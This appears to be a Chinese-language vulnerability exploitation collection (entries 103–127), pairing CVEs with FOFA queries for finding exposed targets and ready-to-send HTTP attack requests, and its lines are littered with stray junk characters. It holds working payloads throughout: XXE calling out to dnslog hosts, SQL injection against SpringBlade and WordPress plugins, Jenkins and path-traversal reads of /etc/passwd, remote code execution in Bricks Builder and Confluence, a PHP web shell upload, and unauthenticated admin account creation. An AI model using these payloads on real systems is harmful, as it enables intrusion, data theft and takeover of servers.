  ]# d; {2 C* [- I( aPOST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 Y/ B4 h% R' C! I6 |% W) B5 ]( ~, H: pConnection: close
; A1 ~' E" y" J1 x7 B! BContent-Length: 792
/ U; X2 U1 A+ aAccept-Encoding: gzip
. c, v% w' u9 S/ R% K& e
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
, D! h% ?$ j7 L* X1 y! F
# |2 I6 u! W0 v) j103. Ivanti Pulse Connect Secure VPN XXE
3 m3 X9 i7 [& d/ c) sCVE-2024-22024
FOFA：body="welcome.cgi?p=logo"
) l: v3 _* n6 q! aPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
; K4 h- R" \) g$ @/ N7 A, e0 a  S% z1 LConnection: close
) Q, C7 C! D; X- H+ l+ TContent-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

' k/ g2 {  K: O8 Y2 z+ VSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
/ n5 {2 e4 M: W) k2 r
4 b- i6 H) G, B- \7 a
0 U# ~9 C! |$ D) F, H" b" u' v其中SAMLRequest的值是xml文件内容的base64值，xml文件如下
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
CVE-2024-0569
  l- y2 q$ U6 {. OFOFA：title="TOTOLINK"
( H1 L/ H% v9 C. f8 k+ r/ hPOST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript，*/*;q=0.01
( S8 E. d( y/ l+ o4 sX-Requested-with: XMLHttpRequest
. A, F" g4 `& z1 t6 AUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
! O' s. c7 t# A3 L" a; C- g# hReferer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
% `: Q6 j$ T$ X  Y) oAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
# u$ V8 g9 `2 e" BConnection:close

4 I# S  c5 ?8 }) y) t{
$ _, x0 Z: P9 N9 ]* Q8 W1 Z  g# h"topicurl":"getSysStatusCfg",
# T9 k' `% N( o* c"token":""
}

105. SpringBlade v3.2.0 export-user SQL 注入
FOFA：body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL 注入
9 }0 Z) t2 V. N! b. i7 P7 dFOFA：body="Saber 将不能正常工作"
! k, I1 v7 _  ^  q1 XGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
) [9 ]! V! Q. D, B# YHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 o9 T/ I$ K+ b( E1 JBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
: e! |1 [5 `2 [Connection: close
% B0 S0 ~4 \" c* X
8 i5 Y# P. Y" `$ c
107. SpringBlade tenant/list SQL 注入
9 J' }) _# c; k' M1 SFOFA：body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
1 Y& X1 @: a" j5 F* n! mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth:替换为自己的
! G+ Z' C) e; o3 {$ [& qConnection: close
" i$ t8 `; i5 ~* b0 ~
" w% T0 [- O4 Z' p" L+ H
108. D-Tale 3.9.0 SSRF
CVE-2024-21642
4 [5 C( B2 S5 ZFOFA："dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! l$ X3 G# v% E6 P2 |/ d, d: vAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


: q" n/ Q6 Y; Q/ _6 k' n7 `$ T109. Jenkins CLI 任意文件读取
6 n! r: p1 M2 o; UCVE-2024-23897
  g% w% I" k5 YFOFA：header="X-Jenkins"
7 v. y3 I9 ^) Z% c7 }2 ?1 }POST /cli?remoting=false HTTP/1.1
& l3 V# `: W6 @2 d5 QHost:
  U* @8 u: ^1 l& iContent-type: application/octet-stream
4 L! e" ]$ j8 i+ a, e. w- m$ MSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163
1 S: R/ |: a6 d# J  f9 X  ~
# b0 M8 Z8 T2 ub'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

; U) F! }4 _: c7 u8 T5 U: W
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
. U5 X2 M( d5 T2 c- lContent-Type: application/x-www-form-urlencoded
. T, o6 f$ g) V3 _; t6 E) CContent-Length: 0

+ Q, s( |6 [/ w$ d. l
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/ I) d' i2 S) `1 |( h5 d% ~java -jar jenkins-cli.jar help
[COMMAND]
9 C1 O3 X* N( s6 jLists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
4 M9 t& e" N; x+ S; Z+ c
, J! X1 \3 j# w0 @7 E. u
110. Goanywhere MFT 未授权创建管理员
CVE-2024-0204
FOFA：body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
! Q" Q* q( ?! G# O- b/ vGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
1 W! S* r" O# I0 K" L& C) h- iHost: 192.168.40.130:8000
) E0 j" R4 U4 ]. nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
1 l0 [6 f: D5 vAccept: */*
Accept-Language: en
Accept-Encoding: gzip
3 k. J. M2 e2 H" g' M+ r- P2 @. h
7 W# ^9 {2 k* c  q4 H( o$ O( o9 o
2 i  K  B1 \7 f% D+ J111. WordPress Plugin HTML5 Video Player SQL注入
4 r, ]$ d2 c( n) y" p( GCVE-2024-1061
FOFA："wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
6 b9 U  C/ _. MHost: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
, n0 K0 n' f' x& k* r0 u" tAccept-Language: en
Accept-Encoding: gzip


6 {- w8 @2 ?2 h. l112. WordPress Plugin NotificationX SQL 注入
CVE-2024-1698
3 f/ f8 g3 C* C% G! tFOFA：body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
& X0 A' {& I0 F3 N  F1 n/ r$ VHost: {{Hostname}}
; J+ M! Q# q1 p4 w' A6 _( f' {' iContent-Type: application/json
+ w9 Y# X- R! b% I3 I3 l+ V% P
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


) q) u& j% l8 X113. WordPress Automatic 插件任意文件下载和SSRF
CVE-2024-27954
1 T, i( S! J6 i1 S1 @; d( J$ ?5 hFOFA："/wp-content/plugins/wp-automatic"
$ R: I" H. x$ E! \; XGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
9 ]8 x/ U4 i$ H- J8 G; S3 ^Connection: close
! B' j0 c9 P. ~( V% f" S) y$ CAccept: */*
9 c- v$ ^  C( S. fAccept-Language: en
Accept-Encoding: gzip

% _5 [* K: B. x+ H( E9 V4 X
114. WordPress MasterStudy LMS插件 SQL注入
FOFA：body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
3 E' M5 y7 [5 C: M% I4 E2 j/ _Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
5 ^; U# N" L7 I& w3 qConnection: close

  V3 S/ \( s( F, J- ~0 }0 y+ a0 T! A
115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
: u/ @( [9 y% U0 N, U' EFOFA: body="/wp-content/themes/bricks/"
( I% k& |, c) h# S, A5 n1 J8 X; g% u第一步，获取网站的nonce值
; e8 G; I4 ]1 v$ KGET / HTTP/1.1
4 U) r; @9 |: p4 YHost: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
# a9 A9 h8 J3 |. W: uAccept-Encoding: gzip
5 E! X  \* g/ ]5 }) }6 j
6 F- x3 h% |0 T9 ~# t
第二步替换nonce值，执行命令
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 V- q7 u' I3 nConnection: close
Content-Length: 356
0 {/ b/ M4 U& iContent-Type: application/json
Accept-Encoding: gzip

{
"postId": "1",
  "nonce": "第一步获得的值",
/ a. G9 j: L. L4 L  W! m3 Q  "element": {
1 V0 u. Z3 f9 b) \" v8 g    "name": "container",
& K; N% U! T  t, Y    "settings": {
3 v1 ^6 j8 S5 R: [0 g# z3 g, H, c; b      "hasLoop": "true",
. y" C0 Y& a5 i* v2 j      "query": {
        "useQueryEditor": true,
: j0 K+ L# c3 _- X! g' e* Y* {; O/ {        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
4 ?- D* G5 \, i' r9 F& d8 ^  }
: j1 c  W  S7 a3 {}
( D9 Q, g$ X( G% |2 d

2 ^4 I& y5 a* g$ I" p, q116. wordpress js-support-ticket文件上传
FOFA：body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
4 n: Z6 q" M- V% S8 SContent-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

2 [3 g1 e. c6 v" v/ M----------767099171
4 X; t% ^7 [# I$ @0 NContent-Disposition: form-data; name="action"
8 V" B5 ]% x# z4 h! Xconfiguration_saveconfiguration
' E  q5 O$ D- Y& O( u! j" N: }/ M----------767099171
- |2 I+ ]1 r4 E6 {) f1 CContent-Disposition: form-data; name="form_request"
0 `/ n2 B) M! J; |% M7 s- D2 Ljssupportticket
----------767099171
3 J6 p. G  }, o7 R- l: p, UContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--
# F) s1 v$ M0 D7 B2 O) s

117. WordPress LayerSlider插件SQL注入
# j+ ]6 k/ Y. l2 w$ jversion：7.9.11 – 7.10.0
FOFA：body="/wp-content/plugins/LayerSlider/"
2 k2 _' c1 @5 u3 P; s& HGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
2 q" W- I; O# n+ Q* H# WUpgrade-Insecure-Requests: 1
! b, U* b' e( }; z% G& i! Y7 i
, b0 I$ h6 W' r' v6 N8 B
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
CVE-2024-0939
4 z$ s5 m% N# i. b) s1 H: FFOFA：title="Smart管理平台"
  J2 m$ U9 c  b& }8 RPOST /Tool/uploadfile.php? HTTP/1.1
. A; s! \1 i$ t. V/ R8 d2 f3 hHost: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
4 r/ M8 h' U2 d- G* JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
7 w# j' K. k3 a: ]4 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 r1 u$ `5 G7 I- N+ m) HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
: M' Q7 Q* a; W2 F$ N* rContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
* P: m- h1 v# Y" t  {0 MContent-Length: 405
2 M  A" G4 a% t/ A# ^. X2 y6 fOrigin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
% E: h9 V$ Q+ ~, K7 c1 c& @Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
1 Q* Y% W5 L9 z$ F: G' pSec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

) |8 W, g7 _  E8 l' e* [2 U5 E<?php
! m& G, w# A" c% ksystem($_POST["passwd"]);
3 q2 t2 {1 A5 t3 ~+ c?>
-----------------------------13979701222747646634037182887
8 A' e$ k0 \. z# R* kContent-Disposition: form-data; name="txt_path"
* W- F" B; ~6 L" c. `6 I
( X  \, p  i5 C- h1 O6 B- `0 L/home/src.php
2 _" `5 i6 }7 M: Y-----------------------------13979701222747646634037182887--
+ P+ e2 r, M0 H3 `, z! t$ z+ Z! F

6 @# t1 N9 q* `+ T' [2 j访问/home/src.php

119. 北京百绰智能S20后台sysmanageajax.php sql注入
CVE-2024-1254
FOFA：title="Smart管理平台"
& w2 S$ y2 b" R$ B" e: j$ @% h先登录进入系统，默认账号密码为admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.11
Host: x.x.x.x
! s5 F- s# o7 xCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
; m! q& s. r$ |" G" xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
* l1 D& u" E; U! z" N- Q* N" \Accept: */*
1 k7 a/ m8 r+ @  `# K6 D/ mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 J7 L9 }, v6 pAccept-Encoding: gzip, deflate
3 h' ]. h4 \! |% b. rContent-Type: application/x-www-form-urlencoded;
- {# [8 }, C8 f- {& L5 _+ ZContent-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
  q! s2 r# w  n$ G) zSec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
2 G( ?. k! B0 X) W$ \! r+ zX-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
* r% W# g" Y! r4 j. p: E, QConnection: close
) p8 y4 P+ k3 `
  S0 w3 E% D* ]+ y2 |+ v4 G+ G. Bsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

  v! t" ~6 Y. k# Y
* V, I6 q& I8 w5 d" l120. 北京百绰智能S40管理平台导入web.php任意文件上传
9 v+ U  B: v8 v9 S4 X4 eCVE-2024-1253
8 y: c0 L' _  L% sFOFA：title="Smart管理平台"
2 ^6 [3 i. c  `9 pPOST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
+ X4 v5 X4 L1 |  n8 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- C0 x; F- R$ |  Q) c. w/ mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
' D: s2 U4 f; R% MContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
) ~/ ]9 }( U- ?" C, iOrigin: https://ip:port
8 K# |& ^3 _  B% M+ _9 LReferer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
/ a0 H5 N  u) Z% w( E5 j1 YSec-Fetch-Dest: document
3 |) C- J% h) _( e( Z8 TSec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
1 B/ F1 n6 v6 l: lSec-Fetch-User: ?1
0 N) P  p4 ?- ]Te: trailers
6 o" d( U! t7 Y5 fConnection: close
, r7 X2 d, v1 C" U
-----------------------------42328904123665875270630079328
0 e6 d, _: ?2 u0 y  ]) [$ ^/ y% BContent-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
' L% E0 Z) e  R% y' G+ H  R-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"
: V4 Q  L0 l: ]9 g
1
' q5 F. N, W& A; y3 P8 c# c-----------------------------42328904123665875270630079328
8 d* c6 y! |; `Content-Disposition: form-data; name="1_ck"

: `# W: D8 i% C+ S2 |1_radhttp
! f: `2 b0 ^  }/ F3 t! v. R8 M! y1 @" f-----------------------------42328904123665875270630079328
6 z8 @3 H' q( e2 [8 i2 o  Y' PContent-Disposition: form-data; name="mode"
1 M  u# E7 c; p; _; T# M  w- v
import
# d1 m+ B8 `8 t1 `0 P2 p! M-----------------------------42328904123665875270630079328


0 b7 ^* x1 p( K  b3 Y文件路径/upload/2.php

121. 北京百绰智能S42管理平台userattestation.php任意文件上传
! ^6 u2 \3 E' T, J0 f8 NCVE-2024-1918
  h: H* q5 P6 b' o4 u  UFOFA：title="Smart管理平台"
. z1 h. A4 i4 v" y9 @* g: @POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
) D8 y$ ^  }1 Q9 |  k  CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% T6 }8 x: \7 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) R8 P: Q! W5 `, X( nAccept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
$ P9 W  A* L$ w1 X/ FSec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
1 N1 [/ r2 i( I, ~Connection: close
1 ~6 b" O) ~  K! U) ^/ [6 \
-----------------------------42328904123665875270630079328
% U7 z- e) D2 n! \' `+ k# T- c) xContent-Disposition: form-data; name="web_img"; filename="1.php"
1 k  u+ Q3 o5 s0 N4 ]$ y) gContent-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
# I& S; n) {: XContent-Disposition: form-data; name="id_type"
! Q' g/ V. X( l
& b6 G# Q( G5 M% g4 `" x' K; W1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"
, n) B& X  n( a) R
1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

0 V" {5 h/ x7 l/ P- a" @3 ^set
-----------------------------42328904123665875270630079328
( t& V+ D" ]( _3 Z" W! S3 z1 t+ q
" T1 T+ I4 e, w
$ @% M! a9 y$ |4 r6 T6 xboot/web/upload/weblogo/1.php

7 d. X! u# Q2 Z# ~122. 北京百绰智能s200管理平台/importexport.php sql注入
' J& G( z- F. p, FCVE-2024-27718FOFA：title="Smart管理平台"
' i: I* H0 m" |其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容，原文：sql=select 1,database(),version()
$ _! z! S9 n" _5 R: ^  zGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
0 v7 n. s. ~: N! _. s. QHost: x.x.x.x
) `8 B" q4 ?9 D# T8 yCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* f% g: N3 @. YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  H) @  d; s3 y+ z+ b: v# J  UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* z4 b, \2 ^1 w) o& LAccept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
1 G# x( k- @3 L( pSec-Fetch-Dest: document
0 w' ]$ \& p! YSec-Fetch-Mode: navigate
Sec-Fetch-Site: none
1 m( R% G/ T) M! q* R) ~4 s3 qSec-Fetch-User: ?1
Te: trailers
; g! D+ r& p5 O) X$ b) y0 XConnection: close


123. Atlassian Confluence 模板注入代码执行
FOFA：app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
6 y) p4 {9 C0 l7 P" d1 tPOST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
! B0 J0 }' h  A: q6 @) }Accept-Language: en-US;q=0.9,en;q=0.8
. P7 X- c, p9 y& X8 i+ JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
  q* A8 w: h* o6 JConnection: close
6 {7 {6 T" x$ R5 \: ~Content-Type: application/x-www-form-urlencoded
% m: p( ]; m" W1 F3 R  s
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
, C1 |. a. H6 v# r

124. 湖南建研工程质量检测系统任意文件上传
FOFA：body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
* h* p& G: i5 h1 P0 T4 nHost: 192.168.40.130:8282
4 ?% @, N1 g# z5 ]User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
1 [3 N+ A+ D8 a5 {0 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

: b5 K  b) x. B9 H; t
http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect身份验证绕过
! c/ M% @1 J7 t  ECVE-2024-1709
FOFA：icon_hash="-82958153"
2 R9 j  Q% R# w1 f+ Z$ S2 Nhttps://github.com/watchtowrlabs ... bypass-add-user-poc

2 s+ Y4 ?8 ~2 D, ]. j, q
9 H3 a5 f- p& b3 H使用方法
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!


- z8 K( y) G+ d! o创建好用户后直接登录后台，可以执行系统命令。

126. Aiohttp 路径遍历
FOFA：title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
8 Q) l% z$ ?: _  ?1 }Accept: */*
8 f' v9 s/ U' k. o7 wAccept-Language: en
) |2 w1 A. P! ]2 k  bAccept-Encoding: gzip

( F4 J0 t4 Q, R4 w" A* X
1 H5 P; K1 l2 _7 `' R) L127. 广联达Linkworks DataExchange.ashx XXE
FOFA：body="Services/Identification/login.ashx"
7 u8 N7 U$ \, [, KPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
4 A# _4 d9 V; }- kHost: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
2 e- ^- t7 a7 ^+ n9 zContent-Length: 415
% h: F) P: r% N  Y; ^" |7 mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: ?8 K  u2 H  s1 t9 Z3 ~& rAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
: N2 {2 ]3 A, w5 E$ |( C' t5 [+ V. D- }Sec-Purpose: prefetch;prerender
3 q0 `3 z: w9 f& H9 E
------WebKitFormBoundaryJGgV5l5ta05yAIe0
